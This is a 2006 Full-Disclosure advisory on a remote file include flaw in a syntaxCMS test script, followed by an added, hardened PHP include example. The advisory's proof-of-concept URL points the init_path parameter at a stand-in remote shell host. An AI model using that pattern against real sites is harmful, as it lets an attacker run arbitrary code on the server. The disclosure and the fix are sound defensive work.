Computer Security
[EN] securityvulns.ru
From: God Of Death (G.O.D) <mohajali2k4_(at)_gmail.com>
Date: 25.09.2006
Subject: [Full-disclosure] Remote File Include in syntaxCMS


Remote File Include in syntaxCMS

Vulnerable File:

0004_init_urls.php

Vulnerable Code:

  <?php
  include_once( $init_path . '/init.urls.php' );
  ?>

PoC:

http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:

Remove this file. It is not needed; it is only used for tests.

____

Found by MoHaJaLi


Greetz to Eddy_BAck0o

____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
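
A hardened form of the include pattern shown in the report, as an added example that is not part of the original post or of syntaxCMS. It assumes the script should only ever load a local init.urls.php under a fixed base directory; resolve_init_file and the demo directory layout are hypothetical.

```php
<?php
// Added example, not syntaxCMS code; function and directory names are hypothetical.

// Test scripts have no reason to answer web requests.
if (PHP_SAPI !== 'cli') {
    http_response_code(404);
    exit;
}

// Pattern from the report: $init_path is never set inside the file, so with
// register_globals on, the request's init_path parameter supplies it:
//     include_once( $init_path . '/init.urls.php' );

/** Canonical path of $dir/init.urls.php if it is a local file under $base, else null. */
function resolve_init_file(string $dir, string $base): ?string
{
    // Reject stream wrappers and URLs (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $dir)) {
        return null;
    }
    $base = realpath($base);
    $file = realpath($dir . '/init.urls.php'); // false when the file does not exist
    if ($base === false || $file === false) {
        return null;
    }
    // The resolved file must sit below the base directory (stops ../ escapes).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed sample layout so the example runs stand-alone.
$base = sys_get_temp_dir() . '/init_demo_' . getmypid();
mkdir($base . '/lib', 0700, true);
file_put_contents($base . '/lib/init.urls.php', "<?php // constructed stub\n");

// Constructed inputs: a legitimate directory, a URL, a traversal attempt.
$candidates = [$base . '/lib', 'http://remote.example/x?', $base . '/lib/../..'];
foreach ($candidates as $dir) {
    $file = resolve_init_file($dir, $base);
    printf("%-40s %s\n", $dir, $file === null ? 'rejected' : 'included');
    if ($file !== null) {
        include_once $file;
    }
}

unlink($base . '/lib/init.urls.php');
rmdir($base . '/lib');
rmdir($base);
```

Run from the command line, only the first candidate is included; the URL fails the scheme check and the traversal path does not resolve to a file under the base directory.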
